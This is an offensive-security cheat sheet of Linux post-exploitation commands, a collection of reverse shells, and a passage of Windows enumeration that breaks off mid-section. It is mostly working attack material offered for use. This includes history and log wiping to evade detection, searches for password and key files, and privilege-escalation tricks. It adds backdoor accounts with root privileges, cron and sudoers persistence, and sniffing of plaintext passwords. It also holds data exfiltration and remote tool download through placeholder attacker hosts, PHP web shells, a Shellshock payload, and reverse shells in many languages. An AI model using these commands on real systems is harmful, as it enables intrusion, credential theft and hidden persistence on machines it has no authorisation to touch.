        -- Run these first: history -c only clears what is already in memory, while an unset HISTFILE stops bash from writing the session history to disk on exit
        ~$ history -c
        ~$ unset HISTFILE && unset SAVEHIST
        -- Bash only: stop recording into the in-memory history as well
        ~$ set +o history

    `` Paths

        ~$ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/ucb/

    `` Users

        -- Anchor on the shell field so that usernames or comments merely containing these words are not dropped
        ~$ grep -vE "(nologin|false|shutdown|halt|sync)$" /etc/passwd
        ~$ w
        ~$ last

    `` Permissions

        ~$ id
        ~$ sudo -l
        ~$ sudo su
        ~$ su -
        ~$ sudo -i

    `` Version

        ~$ cat /etc/issue
        ~$ cat /proc/version
        ~$ cat /etc/*-release
        ~$ dmesg | grep Linux
        ~$ ls /boot | grep vmlinuz-
        ~$ rpm -q kernel
        ~$ uname -a

`` Enumeration

    `` Basic

        ~$ hostname
        ~$ cat /etc/debian_version
        ~$ cat /etc/hosts
        ~$ cat /etc/issue
        ~$ cat /etc/passwd
        ~$ cat /etc/passwd-
        ~$ cat /etc/redhat-release
        ~$ cat /etc/shadow
        ~$ cat /etc/shadow-
        ~$ cat /root/anaconda-ks.cfg
        ~$ cat /var/apache2/config.inc
        ~$ find /etc/ -readable -type f 2>/dev/null
        ~$ ps faux
        ~$ cat /etc/network/interfaces
        ~$ cat /etc/networks
        ~$ cat /etc/resolv.conf
        ~$ cat /etc/sysconfig/network
        ~$ cat /etc/hosts.allow
        ~$ cat /etc/hosts.deny
        ~$ cat /etc/inetd.conf
        ~$ arp -e
        ~$ cat /proc/net/arp
        ~$ ifconfig -a
        ~$ ip a
        ~$ ss -tun
        ~$ netstat -ntup
        ~$ route
        ~$ df -h
        ~$ cat /proc/mounts
        ~$ cat /etc/fstab
        ~$ cat /etc/exports
        ~$ dpkg -l
        ~$ rpm -qa
        ~$ ls -alh /sbin/
        ~$ ls -alh /usr/bin/
        ~$ ls -alh /var/cache/apt/archives/
        ~$ ls -alh /var/cache/yum/
        ~$ cat /etc/crontab
        ~$ ls -al /etc/ | grep cron
        ~$ crontab -l
        ~$ grep "CRON" /var/log/syslog
        ~$ env
        ~$ cat /etc/profile
        ~$ cat /etc/bashrc
        ~$ cat ~/.*_history
        ~$ cat ~/.bash_profile
        ~$ cat ~/.bashrc
        ~$ cat ~/.bash_logout
        ~$ ls -la ~/.ssh

    `` Extended

        ~$ cat /var/lib/mysql/mysql/user.MYD
        ~$ find . -type f -name *.php -exec grep -Hnie 'pass[a-z]*' {} \; 2>/dev/null
        ~$ find . -type f -name *.rb -exec grep -Hnie 'pass[a-z]*' {} \; 2>/dev/null
        ~$ find . -type f -name *.py -exec grep -Hnie 'pass[a-z]*' {} \; 2>/dev/null
        ~$ find . -type f -name *.pl -exec grep -Hnie 'pass[a-z]*' {} \; 2>/dev/null
        ~$ find . -type f -name authorized_keys 2>/dev/null
        ~$ find . -type f -name config* 2>/dev/null
        ~$ find . -type f -name id_dsa 2>/dev/null
        ~$ find . -type f -name id_rsa 2>/dev/null
        ~$ find . -type f -name identity 2>/dev/null
        ~$ find . -type f -name *.doc* 2>/dev/null
        ~$ find . -type f -name *.key 2>/dev/null
        ~$ find . -type f -name *.keytab 2>/dev/null
        ~$ find . -type f -name *.pub 2>/dev/null
        ~$ find . -type f -name *.rar 2>/dev/null
        ~$ find . -type f -name *.sql 2>/dev/null
        ~$ find . -type f -name *.txt 2>/dev/null
        ~$ find . -type f -name *.xls* 2>/dev/null
        ~$ find . -type f -name *.zip 2>/dev/null
        ~$ find . -type f -name *.7z 2>/dev/null
        ~$ find . -type f -name .bash_history -size +1k 2>/dev/null
        ~$ grep -Irwn . -ie 'pass[a-z]*\|secret\|admin\|root\|smtp_[a-z]*\|db_[a-z]*' --color=always 2>/dev/null

        `` Combo

            ~$ find . -type f \( -name '*.7z' -o -iname '*.doc*' -o -iname '*.docx' -o -name '*id_dsa' -o -name '*id_rsa' -o -name '*.java' -o -name '*.kdbx' -o -name '*.key' -o -iname '*.php' -o -name '*.py' -o -iname '*.rar' -o -iname '*.txt' -o -iname '*.pdf' -o -iname '*.jpg' -o -iname '*.jpeg' -o -iname '*.tif' -o -iname '*.tiff' -o -iname '*.png' -o -name '*.vsd' -o -iname '*.csv' -o -iname '*.pem' -o -iname '*.crt' -o -iname '*.keytab' -o -iname '*.ppt' -o -iname '*.pptx' -o -iname '*.xls' -o -iname '*.xlsx' -o -iname '*.zip' -o -iname '*.ini' \) 2>/dev/null

        `` Solaris (SunOS) example

            ~$ find . -type f -exec /usr/xpg4/bin/grep -E 'pass[a-z]*\|secret\|admin\|root\|smtp_[a-z]*\|db_[a-z]*' {} + 2>/dev/null

    `` Permissions

        `` Readable by given group in cwd

            ~$ find . -xdev -type f -group VAR_STRING -perm -g+r -exec ls -lahd {} \; 2>/dev/null

        `` Bash history readable by anyone in cwd

            ~$ find . -xdev -type f -name .bash_history -perm -o+r -exec ls -lahd {} \; 2>/dev/null

        `` World-writable files owned by root in cwd

            ~$ find . -xdev -type f -user root -perm -o+w -exec ls -lahd {} \; 2>/dev/null

        `` World-readable files owned by root at /root

            ~$ find /root -xdev -type f -user root -perm -o+r -exec ls -lahd {} \; 2>/dev/null

        `` World-writable and executable files in cwd

            ~$ find . -xdev -type f -perm -o+w,o+x ! -type l -exec ls -lahd {} \; 2>/dev/null

        `` SUID and SGID root files in cwd

            ~$ find . -xdev -user root \( -perm -u+s -o -perm -g+s \) ! -type l -exec ls -lahd {} \; 2>/dev/null

        `` Owned by current user in cwd

            ~$ find . -xdev -type f -user $(whoami) -exec ls -lahd {} \; 2>/dev/null

        `` World-writable in cwd

            ~$ find . -xdev -perm -o+w ! -type l -exec ls -lahd {} \; 2>/dev/null

        `` World-readable logs

            ~$ find /var/log -perm -o=r ! -type l -exec ls -lahd {} \; 2>/dev/null

        `` World-writable dirs not owned by current user in cwd

            ~$ find . -type d -perm -o+w ! -perm -a+t ! -user $(whoami) -exec ls -lahd {} \; 2>/dev/null

        `` Orphaned files in cwd

            ~$ find . -xdev \( -nouser -o -nogroup \) -exec ls -lahd {} \; 2>/dev/null

        `` /boot permissions

            ~$ ls -lahd /boot

        `` Capabilities

            ~$ getcap -r . 2>/dev/null

`` Processes

    `` Monitoring

        @ snippets/linux/utils/ps_monitoring.sh

    `` Information

        - /proc/VAR_INTEGER/cmdline
        - /proc/VAR_INTEGER/environ
        - /proc/VAR_INTEGER/cwd
        - /proc/VAR_INTEGER/fd/[#]

`` Open ports

    ~$ timeout 3 bash -c "</dev/tcp/VAR_TARGET_HOST/VAR_TARGET_PORT &>/dev/null" && echo OPEN || echo CLOSED

`` Shell Escapes

    `` vi

        :set shell=/bin/bash:shell
        :!bash

    `` Perl

        exec "/bin/sh";
        perl -e 'exec "/bin/sh";'

    `` Lua

        !sh
        os.execute('/bin/sh')
        os.execute('cmd')

    `` Ruby

        exec "/bin/sh"

    `` Nmap

        ~$ sudo nmap --interactive
        nmap> !sh

    `` AWK

        ~$ sudo awk 'BEGIN {system("/bin/bash")}'

    `` find

        ~$ sudo find .bash_history -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
        ~$ sudo find .bash_history -exec /bin/bash -i \;

    `` sh

        ~$ /bin/sh -i

    `` PHP

        echo os.system('/bin/bash')

    `` FTP

        ~$ sudo ftp
        ! /bin/bash
        ! /bin/sh

    `` man

        ~$ sudo man man
        !bash

        ~$ man ls
        !'sh'

    `` less

        ~$ sudo less /etc/hosts
        !bash

    `` pinfo

        ~$ pinfo ls
        !

    `` lynx

        ~$ lynx --editor=/usr/bin/vim example.com

    `` elinks

        ~$ export EDITOR=/usr/bin/vim
        -- Once the page opens, move the cursor to a text box field, then press ENTER followed by F4.

    `` mutt

        !

    `` expect

        ~$ expect
        spawn sh
        sh

    `` pkexec

        ~$ /usr/bin/pkexec --user root /bin/sh

`` File transfer

    `` nc

        `` Listening for incoming transfer

            ~$ nc -lv4 VAR_ATTACKER_PORT | tar xzfv -
            ~$ tar czfv - *.log | nc VAR_ATTACKER_HOST VAR_ATTACKER_PORT

        `` Connecting to an exposed port; cross-platform, encrypted with OpenSSL

            ~$ nc -lv4 VAR_TARGET_PORT -c 'tar -czf - VAR_TARGET_FILE | openssl enc -e -aes-256-cbc -md md5'
            ~$ nc -v VAR_TARGET_HOST VAR_TARGET_PORT | openssl enc -d -aes-256-cbc -md md5 | tar xz

    `` ncat

        ~$ ncat -lv --ssl VAR_ATTACKER_PORT | tar xzfv -
        ~$ tar czfv - *.log | ncat -v --ssl VAR_ATTACKER_HOST VAR_ATTACKER_PORT

    `` bash

        ~$ nc -lv4 VAR_ATTACKER_PORT | base64 -d -w0 | tar xzv
        ~$ echo $(tar cz *.log | openssl base64 -A) 2>/dev/null > /dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT

    `` /dev/tcp

        ~$ exec 3<>/dev/tcp/VAR_TARGET_HOST/80
        ~$ echo -e "GET / HTTP/1.1\r\nhost: http://VAR_TARGET_HOST\r\nConnection: close\r\n\r\n" >&3
        ~$ cat <&3

    `` Pull external goodies and run in background

        `` Goodies

            # TODO: Sources + github

        `` Manual execution

            ~$ export E_NA=pgz E_HO=http://VAR_ATTACKER_HOST:VAR_ATTACKER_PORT; wget "$E_HO/$E_NA.x" && tar xzf $E_NA.x && cd $E_NA && chmod a+x ./*

        `` Automated execution

            ~$ export E_NA=pgz E_HO=http://VAR_ATTACKER_HOST:VAR_ATTACKER_PORT; wget "$E_HO/$E_NA.x" && tar xzf $E_NA.x && cd $E_NA && chmod a+x ./* && for x in "linenum.sh -t" "linuxprivchecker.py extended" "linux-suggester.pl" "suggester.sh" "unix-privesc-check detailed"; do ./$x >> "${x:0:2}${#x}".log & done

`` Privilege escalation

    `` Password Bruteforcing

        @ snippets/linux/utils/bruteforce.sh

    `` SUID and paths

        `` Check

            ~$ objdump -x $i | grep -i path
            ~$ ptrace

        `` Exploiting

            ~$ echo "/bin/bash -i" > cat
            ~$ chmod +x ./cat
            ~$ export PATH=.:$PATH

    `` SUID and function export

        ~$ function /usr/sbin/service() { cp /bin/bash /dev/shm && chmod +s /dev/shm/bash && /dev/shm/bash -p; }
        ~$ export -f /usr/sbin/service

    `` SUID and LD_PRELOAD

        @ snippets/linux/backdoors/ld_preload.c

        ~$ sudo LD_PRELOAD=ld_preload.so binary

    `` SUID and .so injection

        @ snippets/linux/backdoors/so_injection.c

        ~$ strace binary 2>&1 | grep -i -E "open|access|no such file"

    `` Xorg

        ~$ cd /etc; Xorg -fp "toor::16431:0:99999:7:::" -logfile shadow :1;su

    `` APT

        /etc/apt/apt.conf.d/
        APT::Update::Post-Invoke{"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc VAR_ATTACKER_HOST VAR_ATTACKER_PORT >/tmp/f";};

`` Persistence

    `` Accounts

        `` useradd

            ~$ useradd --non-unique -u 0 -g 0 -m -s /bin/bash -p $(echo 'VAR_PASSWORD' | openssl passwd -1 -stdin) VAR_USERNAME

        `` /etc/passwd

            ~$ echo "VAR_USERNAME:`openssl passwd -6`:0:0:root:/root:/bin/bash" >> /etc/passwd

        `` Add to sudoers

            ~$ echo "VAR_USERNAME    ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

    `` SSH

        `` Reconnect

            @ snippets/linux/backdoors/ssh_reconnect.sh

        `` Overwrite

            ~$ debugfs -w /dev/sda1 -R "cat /root/.ssh/authorized_keys"
            ~$ debugfs /dev/sda1 -R "blocks /root/.ssh/authorized_keys"
            ~$ dd if=my_id_rsa.pub of=/dev/sda1 seek=1608806 bs=4096 count=1
            ~$ sync

    `` Scheduling

        ~$ echo -e '#!/bin/bash\necho "VAR_USERNAME ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/test
        ~$ chmod +x /etc/cron.hourly/test

    `` Policykit CVE-2018-19788 (pre 2018/12)

        ~$ systemctl --version
            systemd 239
        ~# useradd -u 4000000000
        ~$ systemd-run -t /bin/bash

    `` SUID

        @ snippets/linux/backdoors/suid_popen.c

`` House cleaning

    `` Logs

        - /var/run/utmp
        - /var/log/wtmp
        - /var/log/btmp
        - /var/log/lastlog
        - /var/log/auth.log
        - /var/log/secure
        - /var/log/messages
        - /var/log/apache2/access.log
        - /var/log/apache2/error.log
        - /etc/syslog.conf

    `` Shredding

        ~$ shred -zu file

    `` Search for IP

        ~$ grep -Rl VAR_TARGET_HOST / 2>/dev/null

`` Backdoors

    `` Execute shell commands over UDP

        -- Useful for injecting into shell-based cron jobs
        @ snippets/linux/shells/bind/udp.sh

`` Networking

    `` Bandwidth

        ~$ iftop -i tap0 -f "host VAR_TARGET_HOST"

        ~$ iptables -I INPUT 1 -s VAR_TARGET_HOST -j ACCEPT
        ~$ iptables -I OUTPUT 1 -d VAR_TARGET_HOST -j ACCEPT
        ~$ iptables -Z
        ~$ iptables -vn -L OUTPUT | grep VAR_TARGET_HOST
        ~$ iptables -Z

    `` Services

        ~$ lsof -i -n | egrep 'COMMAND|LISTEN'
        ~$ netstat -ntup
        ~$ ss -ltup

    `` Sniffing

        `` Generic

            ~$ tcpdump -i any -vvv -XX -n -w dump.cap src not VAR_ATTACKER_HOST and (dst port 80 or dst port 443)
            ~$ tcpdump -i any -vvv -XX -n -w dump.cap src net VAR_TARGET_CIDR and port not 22

        `` New connections only

            ~$ tcpdump -vvv -XX -i any "tcp[tcpflags] & (tcp-syn) != 0" and net VAR_TARGET_CIDR

        `` HTTP GET and POST packets and interesting data

            ~$ tcpdump -i any -A -v -n -l | egrep -i "POST /|GET /|Host:|pwd=|passwd=|password=|Set-Cookie|Cookie:"

        `` Plaintext passwords

            ~$ tcpdump port http or port ftp or port smtp or port imap or port pop3 or port telnet -l -A | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '

`` Dirtycow stability

    ~$ echo 0 > /proc/sys/vm/dirty_writeback_centisecs

`` Dirty tricks

    `` SSH

        alias ssh='ssh -o ControlMaster=yes -o ControlPath=/tmp/%r@%h:%p -o ControlPersist=yes $1'


================================================
FILE: Target.Host.OS.Shells.txt
================================================
`` Linux

    @ snippets/linux/shells/

`` Windows

    @ snippets/windows/shells/

`` Shell

    ~$ nohup /bin/bash -i >& /dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT 0>&1
    ~$ exec 77<>/dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT;/bin/sh <&77 >&77 2>&77
    ~$ exec 77<>/dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT && while read line 0<&77; do $line 2>&77 >&77; done

`` nc

    `` Listener

        ~$ nc -klv VAR_ATTACKER_PORT
        ~$ ncat -klv --ssl VAR_ATTACKER_PORT

    `` Shell

        `` nc

            ~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc VAR_ATTACKER_HOST VAR_ATTACKER_PORT >/tmp/f
            ~$ rm /tmp/f;mkfifo /tmp/f;nc VAR_ATTACKER_HOST VAR_ATTACKER_PORT 0</tmp/f | /bin/sh -i 2>&1 | tee /tmp/f

        `` ncat

            ~$ ncat -e /bin/sh --ssl VAR_ATTACKER_HOST VAR_ATTACKER_PORT

`` PHP

    <?php $sock=fsockopen("VAR_ATTACKER_HOST", VAR_ATTACKER_PORT); $proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>

    <?php passthru('/bin/sh -c "exec nohup setsid /bin/sh 0</dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT 1>&0 2>&0 &"'); ?>

    <?php passthru('/bin/sh -c "exec nohup setsid /bin/sh 0</dev/tcp/'.$_POST["ip"].'/'.$_POST["port"].' 1>&0 2>&0 &"'); ?>

    -- If file descriptor 3 doesn't work, try 4, 5 or 6
    <?php $sock=fsockopen("VAR_ATTACKER_HOST", VAR_ATTACKER_PORT); exec("/bin/sh -i <&3 >&3 2>&3"); ?>

    <?php passthru($_GET["cmd"]); ?>

    <?php passthru($_GET["cmd"]); die(); ?>

    <?php passthru('rm /tmp/.kernel;mkfifo /tmp/.kernel;cat /tmp/.kernel|/bin/sh -i 2>&1|nc VAR_ATTACKER_HOST VAR_ATTACKER_PORT >/tmp/.kernel'); ?>

    <?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>

    <?php system($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>

    -- Windows
    <?php @error_reporting(0);@set_time_limit(0);@ignore_user_abort(1);@ini_set("max_execution_time",0);$s=@fsockopen("tcp://VAR_ATTACKER_HOST",VAR_ATTACKER_PORT);while($c=fread($s,2048)){$out="";if(substr($c,0,3)=='cd '){chdir(substr($c,3,-1));}else if(substr($c,0,4)=="quit"||substr($c,0,4)=="exit"){break;}else{$out=shell_exec(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs);break;}}fwrite($s,$out);}fclose($s);?>

`` Python

    `` GNU/Linux

        ~$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("VAR_ATTACKER_HOST",VAR_ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

    `` Windows

        ~$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("VAR_ATTACKER_HOST",VAR_ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["%ComSpec%"]);'

`` Powershell

    `` CLI

        ~> powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("VAR_ATTACKER_HOST",VAR_ATTACKER_PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
        ~> powershell -nop -c "$ip='VAR_ATTACKER_HOST'; $ic = New-Object System.Net.NetworkInformation.Ping; $po = New-Object System.Net.NetworkInformation.PingOptions; $po.DontFragment = $true; $ic.Send($ip,60*1000, ([text.encoding]::ASCII).GetBytes('OK'), $po); while ($true) { $ry = $ic.Send($ip,60*1000, ([text.encoding]::ASCII).GetBytes(''), $po); if ($ry.Buffer) { $rs = ([text.encoding]::ASCII).GetString($ry.Buffer); $rt = (Invoke-Expression -Command $rs | Out-String ); $ic.Send($ip,60*1000,([text.encoding]::ASCII).GetBytes($rt),$po); } }"

`` go

    echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","VAR_ATTACKER_HOST:VAR_ATTACKER_PORT");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

`` telnetd

    ~$ /usr/sbin/telnetd -l bin/sh -p 25

`` openssl

    ~$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
    ~$ openssl s_server -quiet -key key.pem -cert cert.pem -port VAR_ATTACKER_PORT
    ~$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -CAfile /tmp/cert.pem -verify_return_error -verify 1 -connect VAR_ATTACKER_HOST:VAR_ATTACKER_PORT > /tmp/s; rm /tmp/s

`` Java

    ~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=VAR_ATTACKER_HOST LPORT=VAR_ATTACKER_PORT -f war > /root/Desktop/shell.war

    @ snippets/java/shells/

`` Lua

    ~$ lua -e "require('socket');require('os');t=socket.tcp();t:connect('VAR_ATTACKER_HOST','VAR_ATTACKER_PORT');os.execute('/bin/sh -i <&3 >&3 2>&3');"

`` Ruby

    ~$ ruby -rsocket -e'f=TCPSocket.open("VAR_ATTACKER_HOST",VAR_ATTACKER_PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

`` X

    `` Target

        ~$ xterm -display VAR_ATTACKER_HOST:1

    `` Attacker

        ~$ Xnest :1 -listen tcp
        ~$ xhost +VAR_TARGET_HOST

`` telnet

    ~$ rm -f /tmp/p; mknod /tmp/p p && telnet VAR_ATTACKER_HOST VAR_ATTACKER_PORT 0/tmp/p
    ~$ telnet VAR_ATTACKER_HOST 80 | /bin/sh | telnet VAR_ATTACKER_HOST 443

`` Gawk

    ~$ awk 'BEGIN {s = "/inet/tcp/0/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT"; while(1) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

`` Perl

    ~$ perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"VAR_ATTACKER_HOST:VAR_ATTACKER_PORT");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
    ~$ perl -e 'use Socket;$i="VAR_ATTACKER_HOST";$p=VAR_ATTACKER_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

    `` Minimalistic approach, useful for injecting into Perl scripts (cron jobs?)

        use IO::Socket::INET; $c=new IO::Socket::INET(PeerAddr,"VAR_ATTACKER_HOST:VAR_ATTACKER_PORT");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;

`` socat

    `` Bind

        ~$ socat TCP-LISTEN:VAR_ATTACKER_PORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
        ~$ socat FILE:`tty`,raw,echo=0 TCP:VAR_TARGET_HOST:VAR_ATTACKER_PORT

    `` Reverse

        ~$ socat TCP-LISTEN:VAR_ATTACKER_PORT,reuseaddr FILE:`tty`,raw,echo=0
        ~$ socat TCP4:VAR_ATTACKER_HOST:VAR_ATTACKER_PORT EXEC:bash,pty,stderr,setsid,sigint,sane

    `` Encrypted shell

        `` Certificates

            ~$ openssl genrsa -out server.key 1024
            ~$ openssl req -new -key server.key -x509 -days 3653 -out server.crt
            ~$ cat server.key server.crt >server.pem
            ~$ chmod 600 server.key server.pem

            ~$ openssl genrsa -out client.key 1024
            ~$ openssl req -new -key client.key -x509 -days 3653 -out client.crt
            ~$ cat client.key client.crt >client.pem
            ~$ chmod 600 client.key client.pem

        `` Server

            ~$ socat ssl-l:VAR_ATTACKER_PORT,reuseaddr,fork,cert=server.pem,cafile=client.crt,verify=1 exec:/bin/sh,pty,setsid,setpgid,stderr,ctty

        `` Client

            ~$ socat -,raw,echo=0 ssl:VAR_ATTACKER_HOST:VAR_ATTACKER_PORT,cert=client.pem,cafile=server.crt

`` HTTP

    `` Shellshock

        Referer: () { :;}; /bin/sh -c "exec /bin/sh 0</dev/tcp/VAR_ATTACKER_HOST/VAR_ATTACKER_PORT 1>&0 2>&0 &"

`` Node.js

    `` Reverse #1

        (function(){
            var net = require("net"),
                cp = require("child_process"),
                sh = cp.spawn("/bin/sh", []);
            var client = new net.Socket();
            client.connect(VAR_ATTACKER_PORT, "VAR_ATTACKER_HOST", function(){
                client.pipe(sh.stdin);
                sh.stdout.pipe(client);
                sh.stderr.pipe(client);
            });
            return /a/;
        })();

    `` Reverse #2

        require('child_process').exec('nc -e /bin/sh VAR_ATTACKER_HOST VAR_ATTACKER_PORT')


================================================
FILE: Target.Host.OS.Windows.txt
================================================
`` Enumeration

    `` Automated

        -- Easily detected by AV without patching
        ~> seatbelt.exe all full > report.txt

    `` whoami

        ~> echo %USERNAME% || whoami.exe
        ~> wmic.exe useraccount where name='%USERNAME%' get sid

        -- Verbose (whoami may trigger EDR)
        ~> whoami.exe /all

    `` Users and Groups

        ~> net.exe users
        ~> net.exe localgroup
        ~> net.exe localgroup Administrators
        ~> net.exe localgroup "Remote Desktop Users"

        -- Verbose, with SIDs
        ~> wmic.exe useraccount list full

    `` OS

        -- Basic
        ~> ver.exe & echo %PROCESSOR_ARCHITECTURE%

        -- With systeminfo
        ~> systeminfo.exe | findstr.exe /B /C:"OS Name" /C:"OS Version" /C:"System Type"
        
        -- Windows Release ID
        ~> reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ReleaseId

        -- WMI variant
        ~> wmic.exe os get OSArchitecture,Caption,Version

        `` File-based

            -- Windows XP
            - C:\Windows\System32\eula.txt

            -- Windows 7
            - C:\Windows\System32\license.rtf

            -- Windows 10
            - C:\Windows\System32\license.rtf (EULA code lookup)

    `` Networking

        ~> ipconfig.exe /all
        ~> arp.exe -a

        -- Routing
        ~> route.exe print
        ~> netstat.exe -r

        -- Listening TCP sockets
        ~> netstat.exe -ano -p tcp | findstr.exe LISTENING

        -- Listening UDP sockets
        ~> netstat.exe -ano -p udp | findstr.exe LISTENING

        -- Find a binary behind the specific port
        ~> for /f "tokens=3 delims=LISTENING" %i in ('netstat.exe -ano ^| findstr.exe "VAR_INTEGER"') do tasklist.exe /fi "pid eq %i"
        ~PS> netstat.exe -aon | Select-String VAR_INTEGER | ForEach-Object { $_ -replace '\s+', ',' } | ConvertFrom-Csv -Header @('Empty', 'Protocol', 'AddressLocal', 'AddressForeign', 'State', 'PID') | ForEach-Object { $portProcess = Get-Process | Where-Object Id -eq $_.PID; $_ | Add-Member -NotePropertyName 'ProcessName' -NotePropertyValue $portProcess.ProcessName; Write-Output $_ } | Sort-Object ProcessName, State, Protocol, AddressLocal, AddressForeign | Select-Object  ProcessName, State, Protocol, AddressLocal, AddressForeign | Format-Table

        -- Established connections
        ~> netstat.exe -an | findstr.exe ESTABLISHED

        `` Firewall Settings

            `` State

                ~> netsh.exe firewall show state

            `` Open ports

                @ snippets/windows/utils/Win10FirewallRules.ps1

        `` In the Windows Network context

            `` General

                -- Computer name, user name, OS version and communication settings
                ~> net.exe config workstation
                ~> net.exe config server

                -- Show information about all sessions with the local computer
                ~> net.exe session

                -- Show a list of network connections
                ~> net.exe use

                -- Show a list of computers
                ~> net.exe view

                -- Shared resources for all domains in the network
                ~> net.exe view /all /domain

                -- Show password and logon policy for the domain
                ~> net.exe accounts /domain

            `` Network Shares

                ~> net.exe share
                ~> wmic.exe share list

            `` Windows Server (RDP)

                ~> qwinsta.exe
                ~> quser.exe

        `` SNMP

            ~> reg.exe query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
            ~PS> Get-ChildItem -Path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

        `` IPv6 support

            ~PS> Write-Host 'OS Supports IPv6: ' $( [System.Net.Sockets.Socket]::OSSupportsIPv6 )

    `` PowerShell

        ~> reg.exe query "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
        ~> reg.exe query "HKLM\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine" /v PowerShellVersion

        `` Check if running as 64-bit

            ~> [Environment]::Is64BitProcess

        `` Check if running in CLM
        
            ~> $ExecutionContext.SessionState.LanguageMode

    `` Startup Items

        ~> wmic.exe startup list brief

    `` Services

        ~> net.exe start

        ~> sc.exe query state= all | findstr.exe "SERVICE_NAME DISPLAY_NAME STATE"

        `` Powershell

            ~PS> Get-Service VAR_NAME | format-list
            ~PS> Get-Itemproperty HKLM:\System\CurrentControlSet\services\VAR_NAME

        `` Unquoted Service Paths

            ~> wmic.exe service get Name,DisplayName,PathName,StartMode | findstr.exe /i /v "C:\Windows" | findstr.exe /i /v """

    `` Installed software

        ~> dir /a "C:\Program Files" "C:\Program Files (x86)"
        ~> reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE

        -- Verbose but takes time
        ~> wmic.exe product get Name,Version

        -- Drivers
        ~> driverquery.exe

        -- AV
        ~> wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /format:list

        -- Installed Patches
        ~> wmic.exe qfe get Caption,Description,HotFixID,InstalledOn

        -- Security mechanisms enabled?
        ~> reg.exe query HKLM\System\CurrentControlSet\Control\DeviceGuard

            - EnableVirtualizationBasedSecurity - Credential Guard (VBS enabled)
            - RequirePlatformSecurityFeatures - 1 for Secure Boot only
            - RequirePlatformSecurityFeatures - 3 for Secure Boot and DMA Protection

    `` Processes

        ~> tasklist.exe /svc
        ~> tasklist.exe /v /fi "username eq system"

        -- Verbose
